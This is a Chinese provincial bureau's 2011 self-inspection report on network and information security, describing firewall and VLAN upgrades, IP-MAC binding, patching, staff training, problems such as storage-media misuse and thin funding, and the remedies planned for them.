2011年,在省政府办公厅和省工信厅的指导下,我局进一步加强了网络信息安全制度建设,不断强化日常检查与防护管理,配备健全了网络信息安全设备,部署开展了信息保密与安全培训及督导工作,确保了网络与信息安全。现将我局2011年网络与信息安全自查情况报告如下:
一、网络与信息安全工作落实情况
1、重视制度建设,加强日常信息安全管理工作。为进一步加强网络与信息安全的管理工作,今年以来,我局重新修订了网络与信息安全制度,并下发各处室贯彻执行。
2、加强重点部位的设备更新。新购进了一台联想网御防火墙,两台三层交换机安装在网络机房,将服务器群组划分至统一的VLAN下,并与办公用电脑网段分开,直接将服务器接至硬件防火墙下。对门户网站服务器、邮件服务器和文件服务器重新进行布署,对全局所有接入互联网的电脑在服务器端进行IP与MAC地址绑定,并实名登记上网。在服务器端关闭了不必要的端口,定期修补系统漏洞,定期更换
口令,定期备份数据,分析系统日志。
3、加强日常的管理、检查和督导工作。除定期监测系统流量,分析病毒日志,进行安全检查外,在元旦、五
一、国庆节以及庆祝建党90周年等重要时期,还专门下发通知,加强全局网络与信息安全检查工作。
4、强化责任意识,加强信息化安全培训工作。今年以来,全局共进行了三期网络与信息安全培训,并与有关处室、单位负责信息网络安全工作人员签订了保密协议。
二、网络与信息自查问题及整改落实情况
经认真对照网络与信息安全制度,对全局网络设备进行了自查,主要发现两个问题:
1、存储介质存在混用情况。由于工作人员使用存储介质过于普遍,加之使用时相对私密,造成管理难度大。
解决方法:对涉密计算机统一贴出保密警示标志,禁用USB端口,并定期检查涉密计算机的使用日志,杜绝非法使用存储介质和交叉感染机会。
2、网络与安全信息经费少。由于办公经费紧张,导致网络与信息安全维护经费投入较少,安全设备更新慢,有些重点部位的设备配备较为简单,有些设备因长期负载趋于老化、防护能力有限。
解决方法:向财政和网络与信息安全管理部门申请专项维护经费,弥补资缺口,加快设备更新步伐。
三、网络与信息安全工作的经验与建议
1、防护设备的智能化可成倍提高工作效率。当前各单位普遍存在网络与信息化安全工作经费投入少、人员紧张的问题。为此,建议在各单位增设智能化防护设备、安全监控设备,通过设备智能分析、智能定位风险点,大大减轻手工劳动与人力投入。
2、增强工作人员的责任心是做好网络与信息安全的最可靠保障。网络与信息安全责任重大,容不得丝毫疏忽和大意。只有在工作中加强工作人员的责任感,才能做到防范于未然。
为此,我局将进一步建立健全网络与信息安全管理制度,强化人员岗位培训,完善技术措施,不断提高网络与信息安全防护能力。
省局办公室
二○一一年十月三十日
点击咨询 